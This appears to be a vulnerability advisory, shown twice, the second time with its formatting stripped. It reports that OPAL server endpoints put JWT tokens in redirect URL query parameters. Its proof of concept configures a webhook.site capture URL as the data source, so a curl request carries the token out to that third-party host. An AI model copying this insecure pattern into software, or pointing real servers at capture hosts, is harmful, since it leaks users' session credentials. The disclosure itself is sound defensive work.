Description
Vulnerability Overview
This vulnerability involves JWT tokens being exposed in URL query parameters when accessing OPAL server data configuration endpoints.
Affected Code
|
redirect_url = set_url_query_param(url, "token", token) |
|
return RedirectResponse(url=redirect_url) |
|
redirect_url = set_url_query_param(url, "token", token) |
|
return RedirectResponse(url=redirect_url) |
Issue Details
- JWT tokens are passed as URL query parameters, which risks exposure via web server logs, browser history,
Referer headers, and other sources.
- While logs mask a portion of the token (
short_token), the actual redirect URL can contain the complete token.
PoC
Environment Setup
docker run -d --name opal-example-opal_server-1 \
-p 7002:7002 \
-e OPAL_POLICY_SOURCE_TYPE=GIT \
-e OPAL_POLICY_REPO_URL="https://github.com/permitio/opal-example-policy-repo" \
-e OPAL_DATA_CONFIG_SOURCES='{"external_source_url":"https://webhook.site/4b07aedd-1ed5-4c7b-bf00-ba65a4756b13"}' \
permitio/opal-server:latest
curl Example
curl -s -L -o /dev/null \
-H "Authorization: Bearer 123123-1231231-123123" \
http://localhost:7002/data/config
Impact
Information Exposure
JWT tokens exposed in URLs may be leaked to third parties via web server logs, browser history, and Referer headers.
Session Hijacking
Attackers who acquire valid JWT tokens can compromise user sessions and access privileged resources.
Description
Vulnerability Overview
This vulnerability involves JWT tokens being exposed in URL query parameters when accessing OPAL server data configuration endpoints.
Affected Code
opal/packages/opal-server/opal_server/scopes/api.py
Lines 331 to 332 in df69da9
opal/packages/opal-server/opal_server/data/api.py
Lines 98 to 99 in df69da9
Issue Details
Refererheaders, and other sources.short_token), the actual redirect URL can contain the complete token.PoC
Environment Setup
curl Example
curl -s -L -o /dev/null \ -H "Authorization: Bearer 123123-1231231-123123" \ http://localhost:7002/data/configImpact
Information Exposure
JWT tokens exposed in URLs may be leaked to third parties via web server logs, browser history, and
Refererheaders.Session Hijacking
Attackers who acquire valid JWT tokens can compromise user sessions and access privileged resources.